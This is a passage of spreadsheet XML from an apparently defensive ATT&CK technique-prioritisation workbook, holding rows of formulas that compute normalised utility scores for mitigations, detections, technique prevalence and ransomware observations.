        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M599" s="37">
        <v>0</v>
      </c>
      <c r="N599" s="56">
        <v>0</v>
      </c>
      <c r="O599" s="56">
        <v>0</v>
      </c>
      <c r="P599" s="56">
        <v>0</v>
      </c>
      <c r="Q599" s="56">
        <v>0</v>
      </c>
      <c r="R599" s="57"/>
      <c r="S599" s="57">
        <v>0</v>
      </c>
      <c r="T599" s="57"/>
      <c r="U599" s="57">
        <v>0</v>
      </c>
      <c r="V599" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W599" s="37">
        <v>0</v>
      </c>
      <c r="X599" s="37">
        <v>0</v>
      </c>
      <c r="Y599" s="37">
        <v>0</v>
      </c>
      <c r="Z599" s="37">
        <v>0</v>
      </c>
      <c r="AA599" s="37">
        <v>0</v>
      </c>
      <c r="AB599" s="37">
        <v>0</v>
      </c>
      <c r="AC599" s="37"/>
      <c r="AD599" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE599" s="37" t="str" cm="1">
        <f t="array" ref="AE599">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD599)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF599" s="37">
        <v>595</v>
      </c>
      <c r="AG599" s="37" t="str" cm="1">
        <f t="array" ref="AG599">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD599)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH599" s="37">
        <v>595</v>
      </c>
      <c r="AI599" s="37" t="str" cm="1">
        <f t="array" ref="AI599">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD599)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ599" s="37">
        <v>595</v>
      </c>
      <c r="AK599" s="37" t="str" cm="1">
        <f t="array" ref="AK599">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD599)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL599" s="37">
        <v>595</v>
      </c>
      <c r="AM599" s="37" t="str" cm="1">
        <f t="array" ref="AM599">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD599)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN599" s="37">
        <v>0</v>
      </c>
      <c r="AO599" s="37">
        <v>1</v>
      </c>
      <c r="AP599" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ599" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.683333333333337</v>
      </c>
      <c r="AR599" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS599" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT599" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU59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0.96865079365079376</v>
      </c>
    </row>
    <row r="600" spans="1:47" ht="17">
      <c r="A600" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B600" s="37">
        <f t="shared" si="9"/>
        <v>119.25</v>
      </c>
      <c r="C600" s="37" t="s">
        <v>1948</v>
      </c>
      <c r="D600" s="50" t="s">
        <v>1947</v>
      </c>
      <c r="E600" s="37" t="s">
        <v>1949</v>
      </c>
      <c r="F600" s="37">
        <v>1</v>
      </c>
      <c r="G600" s="37">
        <v>0</v>
      </c>
      <c r="H600" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I600" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J600" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K600" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L600" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M600" s="37">
        <v>0</v>
      </c>
      <c r="N600" s="56">
        <v>0</v>
      </c>
      <c r="O600" s="56">
        <v>0</v>
      </c>
      <c r="P600" s="56">
        <v>0</v>
      </c>
      <c r="Q600" s="56">
        <v>0</v>
      </c>
      <c r="R600" s="57"/>
      <c r="S600" s="57">
        <v>0</v>
      </c>
      <c r="T600" s="57"/>
      <c r="U600" s="57">
        <v>0</v>
      </c>
      <c r="V600" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W600" s="37">
        <v>0</v>
      </c>
      <c r="X600" s="37">
        <v>0</v>
      </c>
      <c r="Y600" s="37">
        <v>0</v>
      </c>
      <c r="Z600" s="37">
        <v>0</v>
      </c>
      <c r="AA600" s="37">
        <v>0</v>
      </c>
      <c r="AB600" s="37">
        <v>0</v>
      </c>
      <c r="AC600" s="37"/>
      <c r="AD600" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE600" s="37" t="str" cm="1">
        <f t="array" ref="AE600">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD600)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF600" s="37">
        <v>596</v>
      </c>
      <c r="AG600" s="37" t="str" cm="1">
        <f t="array" ref="AG600">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD600)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH600" s="37">
        <v>596</v>
      </c>
      <c r="AI600" s="37" t="str" cm="1">
        <f t="array" ref="AI600">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD600)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ600" s="37">
        <v>596</v>
      </c>
      <c r="AK600" s="37" t="str" cm="1">
        <f t="array" ref="AK600">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD600)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL600" s="37">
        <v>596</v>
      </c>
      <c r="AM600" s="37" t="str" cm="1">
        <f t="array" ref="AM600">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD600)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN600" s="37">
        <v>0</v>
      </c>
      <c r="AO600" s="37">
        <v>0</v>
      </c>
      <c r="AP600" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ600" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.75</v>
      </c>
      <c r="AR600" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS600" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT600" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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01" spans="1:47" ht="17">
      <c r="A601" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B601" s="37">
        <f t="shared" si="9"/>
        <v>119.45</v>
      </c>
      <c r="C601" s="37" t="s">
        <v>1950</v>
      </c>
      <c r="D601" s="50" t="s">
        <v>1947</v>
      </c>
      <c r="E601" s="37" t="s">
        <v>1951</v>
      </c>
      <c r="F601" s="37">
        <v>1</v>
      </c>
      <c r="G601" s="37">
        <v>0</v>
      </c>
      <c r="H601" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I601" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J601" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K601" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L601" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M601" s="37">
        <v>0</v>
      </c>
      <c r="N601" s="56">
        <v>0</v>
      </c>
      <c r="O601" s="56">
        <v>0</v>
      </c>
      <c r="P601" s="56">
        <v>0</v>
      </c>
      <c r="Q601" s="56">
        <v>0</v>
      </c>
      <c r="R601" s="57"/>
      <c r="S601" s="57">
        <v>0</v>
      </c>
      <c r="T601" s="57"/>
      <c r="U601" s="57">
        <v>0</v>
      </c>
      <c r="V601" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W601" s="37">
        <v>0</v>
      </c>
      <c r="X601" s="37">
        <v>0</v>
      </c>
      <c r="Y601" s="37">
        <v>0</v>
      </c>
      <c r="Z601" s="37">
        <v>0</v>
      </c>
      <c r="AA601" s="37">
        <v>0</v>
      </c>
      <c r="AB601" s="37">
        <v>0</v>
      </c>
      <c r="AC601" s="37"/>
      <c r="AD601" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE601" s="37" t="str" cm="1">
        <f t="array" ref="AE601">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD601)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF601" s="37">
        <v>597</v>
      </c>
      <c r="AG601" s="37" t="str" cm="1">
        <f t="array" ref="AG601">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD601)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH601" s="37">
        <v>597</v>
      </c>
      <c r="AI601" s="37" t="str" cm="1">
        <f t="array" ref="AI601">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD601)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ601" s="37">
        <v>597</v>
      </c>
      <c r="AK601" s="37" t="str" cm="1">
        <f t="array" ref="AK601">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD601)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL601" s="37">
        <v>597</v>
      </c>
      <c r="AM601" s="37" t="str" cm="1">
        <f t="array" ref="AM601">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD601)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN601" s="37">
        <v>0</v>
      </c>
      <c r="AO601" s="37">
        <v>1</v>
      </c>
      <c r="AP601" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ601" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.81666666666667</v>
      </c>
      <c r="AR601" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS601" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT601" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU60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0.97182539682539693</v>
      </c>
    </row>
    <row r="602" spans="1:47" ht="17">
      <c r="A602" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B602" s="37">
        <f t="shared" si="9"/>
        <v>1105.3379812857145</v>
      </c>
      <c r="C602" s="37" t="s">
        <v>1952</v>
      </c>
      <c r="D602" s="50" t="s">
        <v>1953</v>
      </c>
      <c r="E602" s="37"/>
      <c r="F602" s="37">
        <v>1</v>
      </c>
      <c r="G602" s="37">
        <v>1</v>
      </c>
      <c r="H602" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I602" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J602" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K602" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L602" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M602" s="37">
        <v>0</v>
      </c>
      <c r="N602" s="56">
        <v>0</v>
      </c>
      <c r="O602" s="56">
        <v>0</v>
      </c>
      <c r="P602" s="56">
        <v>0</v>
      </c>
      <c r="Q602" s="56">
        <v>0</v>
      </c>
      <c r="R602" s="57"/>
      <c r="S602" s="57">
        <v>12</v>
      </c>
      <c r="T602" s="57" t="s">
        <v>1954</v>
      </c>
      <c r="U602" s="57">
        <v>26</v>
      </c>
      <c r="V602" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3619047142857143</v>
      </c>
      <c r="W602" s="37">
        <v>38</v>
      </c>
      <c r="X602" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y602" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z602" s="37">
        <v>0</v>
      </c>
      <c r="AA602" s="37">
        <v>0</v>
      </c>
      <c r="AB602" s="37">
        <v>0</v>
      </c>
      <c r="AC602" s="37"/>
      <c r="AD602" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE602" s="37" t="str" cm="1">
        <f t="array" ref="AE602">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD602)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF602" s="37">
        <v>598</v>
      </c>
      <c r="AG602" s="37" t="str" cm="1">
        <f t="array" ref="AG602">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD602)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH602" s="37">
        <v>598</v>
      </c>
      <c r="AI602" s="37" t="str" cm="1">
        <f t="array" ref="AI602">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD602)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ602" s="37">
        <v>598</v>
      </c>
      <c r="AK602" s="37" t="str" cm="1">
        <f t="array" ref="AK602">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD602)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL602" s="37">
        <v>598</v>
      </c>
      <c r="AM602" s="37" t="str" cm="1">
        <f t="array" ref="AM602">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD602)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN602" s="37">
        <v>0</v>
      </c>
      <c r="AO602" s="37">
        <v>0</v>
      </c>
      <c r="AP602" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ602" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>368.44599376190484</v>
      </c>
      <c r="AR602" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS602" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT602" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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03" spans="1:47" ht="17">
      <c r="A603" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B603" s="37">
        <f t="shared" si="9"/>
        <v>987.33560014285717</v>
      </c>
      <c r="C603" s="37" t="s">
        <v>1955</v>
      </c>
      <c r="D603" s="50" t="s">
        <v>1953</v>
      </c>
      <c r="E603" s="37" t="s">
        <v>1956</v>
      </c>
      <c r="F603" s="37">
        <v>1</v>
      </c>
      <c r="G603" s="37">
        <v>0</v>
      </c>
      <c r="H603" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I603" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J603" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K603" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L603" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M603" s="37">
        <v>0</v>
      </c>
      <c r="N603" s="56">
        <v>0</v>
      </c>
      <c r="O603" s="56">
        <v>0</v>
      </c>
      <c r="P603" s="56">
        <v>0</v>
      </c>
      <c r="Q603" s="56">
        <v>0</v>
      </c>
      <c r="R603" s="57" t="s">
        <v>1957</v>
      </c>
      <c r="S603" s="57">
        <v>12</v>
      </c>
      <c r="T603" s="57" t="s">
        <v>1954</v>
      </c>
      <c r="U603" s="57">
        <v>26</v>
      </c>
      <c r="V603" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3619047142857143</v>
      </c>
      <c r="W603" s="37">
        <v>38</v>
      </c>
      <c r="X603" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y603" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z603" s="37">
        <v>0</v>
      </c>
      <c r="AA603" s="37">
        <v>0</v>
      </c>
      <c r="AB603" s="37">
        <v>0</v>
      </c>
      <c r="AC603" s="37"/>
      <c r="AD603" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE603" s="37" t="str" cm="1">
        <f t="array" ref="AE603">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD603)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF603" s="37">
        <v>599</v>
      </c>
      <c r="AG603" s="37" t="str" cm="1">
        <f t="array" ref="AG603">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD603)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH603" s="37">
        <v>599</v>
      </c>
      <c r="AI603" s="37" t="str" cm="1">
        <f t="array" ref="AI603">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD603)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ603" s="37">
        <v>599</v>
      </c>
      <c r="AK603" s="37" t="str" cm="1">
        <f t="array" ref="AK603">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD603)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL603" s="37">
        <v>599</v>
      </c>
      <c r="AM603" s="37" t="str" cm="1">
        <f t="array" ref="AM603">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD603)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN603" s="37">
        <v>0</v>
      </c>
      <c r="AO603" s="37">
        <v>0</v>
      </c>
      <c r="AP603" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ603" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>329.11186671428572</v>
      </c>
      <c r="AR603" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS603" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT603" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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04" spans="1:47" ht="17">
      <c r="A604" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B604" s="37">
        <f t="shared" si="9"/>
        <v>988.98321899999996</v>
      </c>
      <c r="C604" s="37" t="s">
        <v>1958</v>
      </c>
      <c r="D604" s="50" t="s">
        <v>1953</v>
      </c>
      <c r="E604" s="37" t="s">
        <v>1959</v>
      </c>
      <c r="F604" s="37">
        <v>1</v>
      </c>
      <c r="G604" s="37">
        <v>0</v>
      </c>
      <c r="H604" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I604" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J604" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K604" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L604" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M604" s="37">
        <v>0</v>
      </c>
      <c r="N604" s="56">
        <v>0</v>
      </c>
      <c r="O604" s="56">
        <v>0</v>
      </c>
      <c r="P604" s="56">
        <v>0</v>
      </c>
      <c r="Q604" s="56">
        <v>0</v>
      </c>
      <c r="R604" s="57" t="s">
        <v>1957</v>
      </c>
      <c r="S604" s="57">
        <v>12</v>
      </c>
      <c r="T604" s="57" t="s">
        <v>1954</v>
      </c>
      <c r="U604" s="57">
        <v>26</v>
      </c>
      <c r="V604" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3619047142857143</v>
      </c>
      <c r="W604" s="37">
        <v>38</v>
      </c>
      <c r="X604" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y604" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z604" s="37">
        <v>0</v>
      </c>
      <c r="AA604" s="37">
        <v>0</v>
      </c>
      <c r="AB604" s="37">
        <v>0</v>
      </c>
      <c r="AC604" s="37"/>
      <c r="AD604" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE604" s="37" t="str" cm="1">
        <f t="array" ref="AE604">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD604)))))&gt;0,"1","0")</f>
